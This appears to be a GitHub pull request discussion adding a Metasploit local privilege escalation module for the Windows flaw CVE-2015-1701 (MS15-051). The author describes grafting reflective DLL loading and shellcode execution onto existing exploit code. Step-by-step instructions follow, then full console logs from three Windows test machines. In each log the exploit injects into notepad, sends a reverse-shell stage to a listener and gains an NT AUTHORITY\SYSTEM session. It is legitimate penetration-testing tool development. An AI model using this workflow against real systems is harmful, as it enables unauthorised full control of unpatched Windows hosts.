Add butchered version of CVE-2015-1701

[OJ]

This PR includes the first pass of a module and source that provides a local privilege escalation for CVE-2015-1701 (MS15-051), documented by FireEye.

Code for this module was blatantly purloined from this repository. It has very few adjustments, other than the ones to make it work within the Meterpreter ecosystem. Those changes are:

• Changing the way some functions are imported.
• Adding the reflective loader functionality (hooray include collisions!)
• Adding the DLL entry point which includes the pointer to the shellcode.
• Wiring in the shellcode invocation at the point where the exploit would normally invoke cmd.exe.

I haven't spent any time tidying the C source up at all. The MSF module pretty much a direct copy of an existing local exploit module with the appropriate tweaks made.

I have successfully tested this on Windows 7 x64 and x86 (build 7600), and on Windows 2008 R2 SP1 x64, though according to the technet articles the vulnerability should work on earlier versions as well.

I'd like to call on the fine minds of @zeroSteiner, @wchen-r7 and @jvazquez-r7 to cast an eye over this. It could use some serious tidying up and you guys are meticulous! Any comments would be appreciated. My feeling is that this can be landed 'as is' without too many changes, and we can spend more time later tidying up the C code if we feel like it.

Note: this PR includes functioning binaries as part of a signed commit.

Verification

• Get hold of a Windows 7 x86 and/or x64 VM, or Windows 2008 VM that is unpatched (ie. missing the patch https://support.microsoft.com/kb/3057191 ).
• Create a meterpreter session as a non-privileged user.
• Background the session and load the exploit post module exploit/windows/local/ms15_051_client_copy_image.
• Configure the post module appropriately for the target in question, and select an appropriate payload.
• Run the exploit and hopefully you'll see a SYSTEM shell come flying back at you.

Sample Runs

Windows 7 x86

meterpreter > getuid
Server username: dobby-PC\dobby
meterpreter > sysinfo
Computer        : DOBBY-PC
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_AU
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > background
[*] Backgrounding session 9...
msf exploit(ms15_051_client_copy_image) > show options

Module options (exploit/windows/local/ms15_051_client_copy_image):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  9                yes       The session to run this module on.


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: , , seh, thread, process, none)
   LHOST     XXX.XXX.XXX.XXX  yes       The listen address
   LPORT     80               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf exploit(ms15_051_client_copy_image) > run

[*] Launching notepad to host the exploit...
[+] Process 2508 launched.
[*] Reflectively injecting the exploit DLL into 2508...
[*] Injecting exploit into 2508...
[*] Exploit injected. Injecting payload into 2508...
[*] Payload injected. Executing exploit...
[*] Sending stage (884270 bytes) to 120.148.51.167
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
msf exploit(ms15_051_client_copy_image) > sessions[*] Meterpreter session 10 opened (10.1.10.40:4444 -> XXX.XXX.XXX.XXX:49159) at 2015-06-03 21:38:12 +1000
 -i 10
[*] Starting interaction with 10...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DOBBY-PC
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_AU
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

Windows 7 x64

meterpreter > getuid
Server username: WIN-S45GUQ5KGVK\OJ
meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > background
[*] Backgrounding session 5...
msf exploit(ms15_051_client_copy_image) > run

[*] Started reverse handler on 10.1.10.40:4444 
[*] Launching notepad to host the exploit...
[+] Process 856 launched.
[*] Reflectively injecting the exploit DLL into 856...
[*] Injecting exploit into 856...
[*] Exploit injected. Injecting payload into 856...
[*] Payload injected. Executing exploit...
[*] Sending stage (1103410 bytes) to 10.1.10.35
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 6 opened (10.1.10.40:4444 -> 10.1.10.35:49172) at 2015-06-03 20:57:38 +1000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter >

Windows 2008 R2 SP1 x64

meterpreter > getuid
Server username: PWNAGE\OJ Reeves
meterpreter > sysinfo
Computer        : WIN2008R2
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : PWNAGE
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > background
[*] Backgrounding session 12...
msf exploit(ms15_051_client_copy_image) > run

[*] Started reverse handler on 10.1.10.40:5555 
[*] Launching notepad to host the exploit...
[+] Process 444 launched.
[*] Reflectively injecting the exploit DLL into 444...
[*] Injecting exploit into 444...
[*] Exploit injected. Injecting payload into 444...
[*] Payload injected. Executing exploit...
[*] Sending stage (1103410 bytes) to 10.1.10.12
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 13 opened (10.1.10.40:5555 -> 10.1.10.12:49168) at 2015-06-03 22:14:07 +1000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2008R2
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : PWNAGE
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > 

Thanks to @multiplex3r for helping out with testing.

[OJ]

Sounds wonderful to me! Thanks dude :)

[wchen-r7]

Cool!

[zeroSteiner]

My guess is that this is why the exploit is not working on server 2003. user32!gSharedInfo is not available on older versions of Windows.

[OJ]

Yup, good point.

[OJ]

Thanks @wchen-r7 ! I know that @zeroSteiner has more work coming here as well to get things working on some earlier versions.

Cheers for landing :)

[wchen-r7]

Cheers!

[vysecurity]

Does not seem to work... I always get a does not support WOW64...

[OJ]

It works perfectly. Your Meterpreter session must match the target architecture.

[vysecurity]

Yep, my bad :) I had to check the source and figure it out. Just migrate...